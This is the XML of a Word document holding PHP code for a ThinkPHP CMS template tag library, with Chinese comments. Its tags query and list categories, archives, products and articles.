    <w:p w14:paraId="011F35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472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Nav($tag, $content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3642E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5A07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d = $tag['pid'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDE2D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15905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5C93FD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lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346D71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getAllCategory(0,"$pid","$limit");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A51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ey =&gt; \$nav):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C86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0C44E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499818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6AF646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 ?&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F15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390618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F9C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6763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文章归档列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F67A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5B6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Archived($tag, $content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFF20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8EC0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676EF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277F7D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think\Db::name('article')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FB1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FROM_UNIXTIME(publishtime,'%Y-%m') as date,count(id) as count")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB246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status',0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E36CD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group('date')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1781D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ate DESC')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8FA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0735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ey =&gt; \$archived):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65059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chived['url'] = url('search/search4Date',['date' =&gt; \$archived['date']]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B38B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5CF86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407E6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4D1AB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 ?&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142710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39C14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EE8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21BC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商品列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A52E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D455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Product($tag, $content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D36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F60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d = isset($tag['cid']) ? $tag['cid'] : 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="279BB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by']) ? $tag['orderby'] : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDC0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63D10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64DB0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sset($tag['field']) ? $tag['field'] : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B47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434468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32603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product')-&gt;where(['cid'=&gt; $cid,'status' =&gt; 0]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F58A6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eld" != ''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E89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field("$field");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5381A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C633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3EAA2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21A4E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100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gt; 0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B34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pagesize);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FEB73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ge = \$list-&gt;render();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C62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BB1B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1AD1E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01F7C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4B0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4A4CF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933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59ED2D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ey =&gt; \$product):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE7E5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duct['url'] = url('show/index',['cid' =&gt; \$product['cid'],'id' =&gt; \$product['id']]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D501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73DE69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368C12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36B7B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 ?&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42458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016AA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CEA5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A61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文章列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFE5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567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Article($tag, $content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68906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8AD3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d = isset($tag['cid']) ? $tag['cid'] : 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D432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by']) ? $tag['orderby'] : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A31B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3D74B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40DF05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sset($tag['field']) ? $tag['field'] : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DA07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pty = isset($tag['empty']) ? $tag['empty'] : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355F8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Db::name('category')-&gt;where('pid',$cid)-&gt;field('id')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D215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_r(array_column($children_ids,'id'));die;*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738004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11334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783BB2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status'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254BC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存在子类，则获取子类下的文章</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668D6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id){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3F6A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cid'] = $cid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DDE6D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think\Db::name('category')-&gt;field('id')-&gt;where('pid',\$condition['cid'])-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690D8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array_column(\$children_ids,'id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A79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DB0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article')-&gt;where(\$condition);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA2F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children_ids) &amp;&amp; \$children_ids){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5A7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list-&gt;whereor('cid','in',\$children_ids);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02AB1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A522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eld" != ''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152CF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field("$field");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7877A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FB5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6666A1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0A610F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A8C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gt; 0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA20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list=\$list-&gt;paginate($pagesize);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7940E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list-&gt;render();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A820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A993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63C5F5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3C767A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3EB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0872E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6836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4B0AF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ey =&gt; \$article):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF1A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url'] = url('show/index',['cid' =&gt; \$article['cid'],'id' =&gt; \$article['id']]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B206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650F0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0C2DD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567F66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70978F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0172AB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231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77380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common\taglib;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750AE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template\TagLib;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E93E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B6223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Fx extends TagLib{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFA8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F0CD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定义标签列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200E8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CAAE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tags   =  [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42949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ose'     =&gt; ['attr' =&gt; 'time,format', 'close' =&gt; 0], </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CE9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attr' =&gt; 'id,limit,order', 'close' =&gt; 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668D50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gt; ['attr' =&gt; 'id,tid,limit,order,pagesize,field,image', 'close' =&gt; 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5662D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gt; ['attr' =&gt; 'field,order,limit,pagesize,flags,typeid,image,id', 'close' =&gt; 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C589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     =&gt; ['attr' =&gt; 'field,order,limit,pagesize,id,tid', 'close' =&gt; 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3B5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nk'     =&gt; ['attr' =&gt; 'order,limit,pagesize,id,img', 'close' =&gt; 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D7B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256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0BA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栏目分类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F404A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C9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Mychannel($tag, $content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A18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DA6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sset($tag['id']) ? $tag['id'] : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B1B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 ? $tag['order'] : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541C77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6333D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57A21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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008EB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 /*unset</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>销毁代码，处理怪异问题，待研究</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D885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72C6E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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>栏目</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>3*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53ECA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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396A2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id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398A4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71A0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mychannel')-&gt;where(\$where);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672E3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排序</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72DBD6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order" != ''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C6A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3E0C0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DF96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id asc");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12ED6B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4AD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数量</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080EC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3B35A0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134E37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AF9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7D9D9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开始赋值</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BDC7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2BADD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 =&gt; \$fx):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46775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6B0A2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7F464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457AE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167CC1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4B1C3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87F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3A20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栏目分类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF45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BA8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Typeid($tag, $content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E620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D8F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sset($tag['id']) ? $tag['id'] : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681F6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d = isset($tag['tid']) ? $tag['tid'] : 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E9A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sset($tag['field']) ? $tag['field'] : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573436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 ? $tag['order'] : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090A9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779FC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48683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isset($tag['image']) ? $tag['image'] : "";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F84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2ECD6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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A065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 /*unset</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>销毁代码，处理怪异问题，待研究</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0015AE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5AC7C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d !=''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9CE0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d']  =   $tid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4657C4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135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模型频道</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72491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判断是否有缩略图</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A437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age" != ''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099C3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age'=='image'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3AA4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neq',''];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CD2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mage'=='imageNo'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478121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eq',''];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEAA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7929C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8770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E30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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>栏目</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>3*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BEACA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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59671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id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6232F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7FBD6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typeid')-&gt;where(\$where);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736AD8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栏目排序</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650DC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5C8FF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193644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200C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des desc,id asc");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0399B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AB7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分页与数量</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2BE1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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6B69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0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCD46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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A11D7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98BB2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pagesize);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4DDF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9582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list-&gt;render();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C91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243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数量</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF9A0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46983B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5920B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9326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43420B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AF1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开始赋值</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72DC2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028C5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 =&gt; \$fx):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD53D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x['url']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B17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x['url'] = url("article/typeid",["id"=&gt;\$fx["id"]]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7CE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EE4A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49A98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073B9B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14C56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73EBE4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3B9D1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F52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D558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获取文章列表</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">  \$url = url("article/article",["id"=&gt;\$v["id"]]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB98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v["title"];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE45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v["id"];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132B23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v["typeid"];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F4A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v["typeid"];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF182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s=think\Db::getTableInfo('fx_article','fields');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1535C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ct(\$fields);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB4B9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fields[1];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3D8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FD7E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Article($tag, $content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F6D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48A977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 = isset($tag['v']) ? $tag['v'] : 'fx';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28526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sset($tag['id']) ? $tag['id'] : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D11F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isset($tag['typeid']) ? $tag['typeid'] : 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C00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 ? $tag['order'] : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2261A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limit = isset($tag['limit']) ? $tag['limit'] : 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18397F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70E3F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sset($tag['field']) ? $tag['field'] : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A7F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s = isset($tag['flags']) ? $tag['flags'] : 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4714F5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isset($tag['time']) ? $tag['time'] : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A216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isset($tag['keywords']) ? $tag['keywords'] : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E18A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isset($tag['image']) ? $tag['image'] : "";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EB9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3438D5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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03664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 /*unset</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>销毁代码，处理怪异问题，待研究</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06050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lags']=$flags;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7CB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6E4288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调用分类栏目</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09815D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42F7D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cid'] = $typeid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FCC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think\Db::name('typeid')-&gt;field('id')-&gt;where('tid',\$condition['cid'])-&gt;cache(_cache('db'))-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786E9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如果分类有子栏目</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46080B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hildren_ids){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBA9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调用全部所有子栏目</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B522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think\Db::name('typeid')-&gt;field("id,tid")-&gt;order("id asc")-&gt;cache(_cache('db'))-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A63D4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 = _typeidTid(\$children_ids,\$condition['cid']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D7A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_data=[];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6695A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_data[]=$typeid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167FF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hildren_ids as \$k =&gt; \$v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46686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ildren_ids_data[]=\$v['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB469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2F6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in',\$children_ids_data];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0FA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5DA4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调用指定分类</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130F3A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typeid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A316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9D44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6947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关键词搜索</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD6D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eywords" != ''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E92B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 =   ['like','%$keywords%'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD2B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BE5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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>文章</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051F1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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F126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id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255B8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A3B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判断是否有缩略图</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD09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age" != ''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6781F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age'=='image'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F200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neq',''];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B746E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mage'=='imageNo'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBC8A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eq',''];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38199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BB3B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F693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842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list = think\Db::name('article')-&gt;where(\$where);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18016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调用自定义属性</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08467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eld" != ''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1166A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field("$field");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA24D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8CF5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文章排序</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB7A3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19142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click'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363EC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click desc,des desc,id desc");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212CD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050A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41C80F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F61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711C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des desc,id desc");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2A4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F501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时间表达式</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C440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me" != ''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688AD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whereTime('create_time','$time');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B34E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C64C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分页与数量</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095E5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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0374B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1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3095A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786FB1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FF23B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pagesize);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE47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BADD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list-&gt;render();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD5B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F22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数量</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490E9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4F4B8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1F35DF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BD5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2A94F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CAD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开始赋值</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71123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63F3A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 =&gt; \${$v}):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14564C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url']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBBE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url'] = url("article/view",["id"=&gt;\${$v}["id"]]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC7C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C3A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1693E2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425B7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49EBA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704A0E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641954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C3F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DCC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轮播图</w:t>
      </w:r>
